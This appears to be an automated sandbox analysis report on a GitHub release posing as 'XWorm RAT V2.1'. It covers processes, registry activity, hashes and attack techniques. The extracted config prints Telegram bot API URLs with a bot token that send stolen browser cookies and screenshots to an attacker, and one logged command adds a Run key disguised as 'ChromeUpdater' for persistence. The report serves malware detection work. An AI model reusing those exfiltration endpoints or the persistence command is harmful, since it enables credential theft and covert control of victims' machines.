Resubmissions
09-01-2025 19:49
250109-yjtbhs1nck 1009-01-2025 19:48
250109-yjlaxa1nbq 309-01-2025 18:48
250109-xf75tszlcj 1009-01-2025 18:45
250109-xeef5azkfp 1009-01-2025 18:34
250109-w7sc1szjak 1009-01-2025 18:31
250109-w54y2axkf1 1003-01-2025 17:08
250103-vntw3atqdt 1003-01-2025 15:27
250103-svv2latmgr 1003-01-2025 15:23
250103-sslp5stlhk 10Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-01-2025 18:45
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.22%20kb
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage?chat_id=2024893777
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates?offset=-
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Command Reciever.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 2 IoCs
pid Process 3116 Command Reciever.exe 1556 Update.exe -
Loads dropped DLL 2 IoCs
pid Process 3116 Command Reciever.exe 1556 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 83 raw.githubusercontent.com 77 raw.githubusercontent.com 78 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 74 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3852 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm RAT V2.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Command Reciever.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Command Reciever.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Command Reciever.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3688 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5356 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4884 msedge.exe 4884 msedge.exe 2796 msedge.exe 2796 msedge.exe 548 identity_helper.exe 548 identity_helper.exe 2460 msedge.exe 2460 msedge.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 3116 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe 1728 Command Reciever.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3116 Command Reciever.exe Token: SeDebugPrivilege 3852 tasklist.exe Token: SeDebugPrivilege 1556 Update.exe -
Suspicious use of FindShellTrayWindow 49 IoCs
pid Process 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 1728 Command Reciever.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 2796 msedge.exe 1728 Command Reciever.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1556 Update.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2796 wrote to memory of 2456 2796 msedge.exe 83 PID 2796 wrote to memory of 2456 2796 msedge.exe 83 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 3912 2796 msedge.exe 84 PID 2796 wrote to memory of 4884 2796 msedge.exe 85 PID 2796 wrote to memory of 4884 2796 msedge.exe 85 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86 PID 2796 wrote to memory of 3152 2796 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8344446f8,0x7ff834444708,0x7ff8344447182⤵PID:2456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:22⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:82⤵PID:3152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:82⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:12⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:12⤵PID:4016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:12⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:12⤵PID:2664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5912 /prefetch:82⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,16590870812293665793,6964185994304824780,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4744 /prefetch:22⤵PID:5876
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:208
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1460
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1092
-
C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:4864 -
C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1728
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8548.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8548.tmp.bat3⤵PID:4044
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 3116"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:1784
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:3688
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f5⤵PID:5276
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:5356
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4764
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD599afa4934d1e3c56bbce114b356e8a99
SHA13f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA25608e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA51276686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da
-
Filesize
152B
MD5443a627d539ca4eab732bad0cbe7332b
SHA186b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA2561e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d
-
Filesize
179KB
MD5f69a450902ae6bc96d3f5876f0484290
SHA1ba352bed8ac9b29bccc1aef038886ce4c19b0a1a
SHA256e530aad91db15339f6be69696c78e82cb01bb86f5ba4a98c7a76a57d66819171
SHA51259b4baf45c6bcbab2cbcbb470f7a24b53ca8a55210f646d706fce8ede05c4e7bbd836307064623e4a441a24092069b9816968bec00bbfd98d2edd3901b1f0488
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD5299629a2a9962edb0f51a1d2c9310c91
SHA1dee3f51a688ae386975b1c6af44dfa7638c92c7a
SHA256dc465654472e407406da2c8c8d620a7f6377a79bd6df43ec2bb2c368ea616fb3
SHA512132cc4b7e814b6599b6c9c1452f7fc2d8a298e79690eed81cab410716cbf3b436e99271a004b6f4133eea36f49b2748555cc6b52b51b6e315484d8563b1cd49b
-
Filesize
124KB
MD5169cf58f06b8453b5b696165a0e2dd17
SHA18d329d3701af773397387c863f9840f95889e1d2
SHA256baa16c0144b688ca80b1c832773cd95a0d5bd90beea12655e66e1e4e49a5f4d3
SHA5120ee49e71f6bec205b23e7cb0313abcf6882c498bf4374be6294c8c0fc2773ea5225d5afb0e2f91928c9f7ac09cbb406252f3e300a4b40c7b62352067c40915f5
-
Filesize
573B
MD5a6d346f58cbec0a6e4015327b25f1537
SHA1750056e65a8b1c20b1a6051f5adcdf35821a6ac1
SHA2561a715b1b5b62ef83ca8c62a18eddb3b5b6b738be2c654ab7a38cf22fdc8bea56
SHA51274e563217a28cd6427739731f51ba2e35ee060c8ae6959d458d06a0416e17ffc6a49f8d0bbcb8d17cef144a45c36eb9f3b92305389ab0cfc5043f530d9f28d89
-
Filesize
6KB
MD501d7a99a36a89df7cd13c2c3ef2f479a
SHA17203f9970bd71c24ea8838db6133d17793b7e518
SHA25613626103354db419ba5c394f357bcd6b2a864a7cd96276a9560f7728a91734db
SHA512ccddf73679da6054fa39457dc3076080b244af0daa80fbce8efe892a4d77fda84a040653e129b4e8be5592624f9875ec160c36b3ae1d473a47c6193c913b4203
-
Filesize
5KB
MD5cf26367b43d4fef4289e88f5ee33cfc1
SHA1f7843ff0a806a98c51489284a3427be657094b92
SHA2567123291bc941c74034a177a706f6f4b62a7cdea4478ba12d37233ce19fc7c4d0
SHA5129fd949aab4039f0b01d090b1fed5ce6f87a3c2b5d910ed7038fb86eb48c39d74a0e69a46f86b3a35c380fbbdaccb83d1e8b311a06808758e0697b39d6aa6e5aa
-
Filesize
6KB
MD5c6ada9e4d78e9de6ec29ad64476c9183
SHA10e4f9de50f856155e2aef99783445bcc5aff3a8e
SHA256fa8599945ddab72a950162f055f83539f5fb18f8e207d8650728ea29a4d07a62
SHA512df95ab5fe95fd4f6f822424a13dd60ebc85ab038137fb3fd2d3d0f088e4a51444f5c40eea2c6a9e0230562dbffdf5b7f668e8effd443b386ff9d647b109e6519
-
Filesize
1KB
MD5b9484559919d919b4d469c106a3fc663
SHA1a5062aa91cc68dea21b031853a5517548c0eaa25
SHA2567784a8c13a0601e52fa98e9e37f4b9489444c53ed2beebf12a223b4a1f3df8db
SHA512493fcb4c62a6d50e0cae3a20e4023b29f259c343eb1651fbd7e05beeae8a257120fee5b237f066e44e5e2301be00aa9c66dc60bed1d55657a6a30524e976e3bf
-
Filesize
1KB
MD5052a9008e16c0ea5c56b2519e2f7bdf0
SHA12167952b1aa180758b02b9efcc7a6049328a2ec8
SHA25645f7b7867ef490b10f820ecc1e86d8588eff8a0d8f4d1e4dec32c444f2482eb5
SHA51234366fad8abc8ecb8b277908f6cb3ed2b989bb214aacf95a73294de6aabc6f2e8219bdea16943762a899c57008ccfa0f9f88c8b4e1bc4407375cae0ba7970f97
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD57207818a405bf56134a602dc7fe07c00
SHA1af9566ccc963cb3c9348d3485974f5fc558519aa
SHA25683cf1e2adb5b00425ecddd635eb0a56a7c6a975dc41b4001e3774688e01369a8
